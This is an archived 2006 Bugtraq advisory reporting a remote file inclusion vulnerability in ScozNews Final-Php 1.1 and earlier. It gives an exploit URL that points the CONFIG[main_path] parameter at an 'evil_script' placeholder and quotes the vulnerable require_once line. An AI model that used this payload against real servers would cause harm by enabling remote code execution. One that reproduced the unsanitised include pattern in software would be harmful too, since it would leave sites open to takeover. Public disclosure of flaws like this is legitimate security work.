[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
ScozNews Final-Php <=1.1 Remote File Inclusion Vulnerability
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: ScozNews Final-Php <=1.1 Remote File Inclusion Vulnerability
- From: x0r0n@xxxxxxxxxxx
- Date: 13 Jul 2006 09:51:46 -0000
ScozNews Final-Php <=1.1 Remote File Inclusion Vulnerability
------------------------------------------
Discoverd By: XORON
------------------------------------------
cont@ct: x0r0n[at]hotmail[dot]com
------------------------------------------
script site: www.scoznet.com
------------------------------------------
Exploit:
http://sitename.com/[path]/sources/functions.php?CONFIG[main_path]=evil_script
------------------------------------------
Code:
require_once($CONFIG['main_path']."/lang/".$CONFIG['lang']."/lang_functions.php")
------------------------------------------
# XORON - WWW.CYBER-WARRIOR.ORG -